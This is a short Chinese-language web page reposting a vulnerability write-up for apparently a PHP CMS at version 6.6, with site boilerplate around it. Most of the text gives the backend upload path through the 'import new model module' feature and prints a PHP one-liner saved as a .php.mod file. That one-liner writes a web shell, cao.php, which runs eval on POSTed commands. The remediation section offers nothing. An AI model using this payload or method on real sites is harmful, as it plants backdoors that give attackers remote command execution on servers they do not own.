来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 以前6.5(http://www.2cto.com/Article/201011/78510.html)的有人发的方法是,(进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,直接把修改过的php的shell改名为shell.php.mod上传,新版...
|
以前6.5(http://www.2cto.com/Article/201011/78510.html)的有人发的方法是,(进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,直接把修改过的php的shell改名为shell.php.mod上传,新版使用uploadm~num.php来递增数字)发现6.6不行,上传之后会变成类似uploadm1324885505nXmTdQamQq.php这样的!
漏洞证明:换了个办法其实也很简单<?fputs(fopen("cao.php","w"),"<?eval(\$_POST[cmd]);?>")?> 保存为1.php.mod 然后还是进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,上传之后马儿就躺在了/e/admin/cao.php了
修复方案:你懂的哦?
作者 discovery |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
